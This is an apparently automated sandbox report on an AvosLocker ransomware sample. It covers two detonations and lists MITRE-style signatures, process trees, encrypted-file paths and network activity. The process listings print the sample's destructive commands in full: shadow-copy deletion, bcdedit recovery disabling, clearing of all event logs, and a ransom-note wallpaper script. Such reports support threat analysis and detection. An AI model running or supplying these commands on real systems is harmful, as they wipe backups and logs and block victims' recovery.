Malware Analysis Report

2024-10-16 03:27

Sample ID 240909-knhhxssdma
Target AvosLocker.exe
SHA256 f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78
Tags avoslocker defense_evasion discovery evasion execution impact ransomware
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score 10/10

SHA256 f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78

Threat Level: Known bad

The file AvosLocker.exe was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Renames multiple (8494) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (10421) files with added filename extension

Deletes shadow copies

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 08:44

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 08:44

Reported

2024-09-09 08:47

Platform

win7-20240729-en

Max time kernel

28s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (10421) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1751524172.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1456 wrote to memory of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 1556 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2804 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\system32\cmd.exe
PID 3008 wrote to memory of 572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2448 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 2704 wrote to memory of 1492 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 1556 wrote to memory of 868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bcdedit.exe
PID 2804 wrote to memory of 1804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 3484 | N/A | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 3236 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4084 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1751524172.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/1804-733-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/1804-771-0x00000000004D0000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 353f9ce8c0e8885e6891672572b4930a
SHA1 9bf169ad078b3066f73676abf564f765cec8f19b
SHA256 56e9074306009b63e84682e5983171dac9f163fffbbc2bf22b580e5908b42c93
SHA512 e2f8f55cabf8d0c7e9393332f0e82c0442518405badd2aa1c9de9df470d1f9b9de512f9bffc641f51b218a5ae3c4414a063c5198cfabd51e0446e0a8b32150c3

memory/3484-24588-0x000000001B670000-0x000000001B952000-memory.dmp

memory/3484-24589-0x0000000000400000-0x0000000000408000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 08:44

Reported

2024-09-09 08:47

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

134s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (8494) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\596685974.png" | C:\Windows\system32\reg.exe | N/A

Drops file in Program Files directory

File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyCalendarSearch.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\officemuiset.msi.16.en-us.vreg.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\root\Templates\1033\ONENOTE\16\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\AppStore_icon.svg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-250.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.strings.psd1 C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\it.pak.DATA C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ContactPhoto.scale-180.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ar-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerview.x-none.msi.16.x-none.tree.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\uk-UA\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-125.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\osmuxmui.msi.16.en-us.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\is.pak C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\main.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nb.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\de-de\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 976 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\SYSTEM32\cmd.exe
PID 3620 wrote to memory of 36952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2396 wrote to memory of 36968 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1324 wrote to memory of 36960 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\BackgroundTransferHost.exe
PID 2212 wrote to memory of 12804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3424 wrote to memory of 12832 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 35884 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 35884 wrote to memory of 36264 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35884 wrote to memory of 36760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\596685974.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

F:\GET_YOUR_FILES_BACK.txt

memory/12832-17651-0x00000218DDA90000-0x00000218DDAB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftdoggch.a3o.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive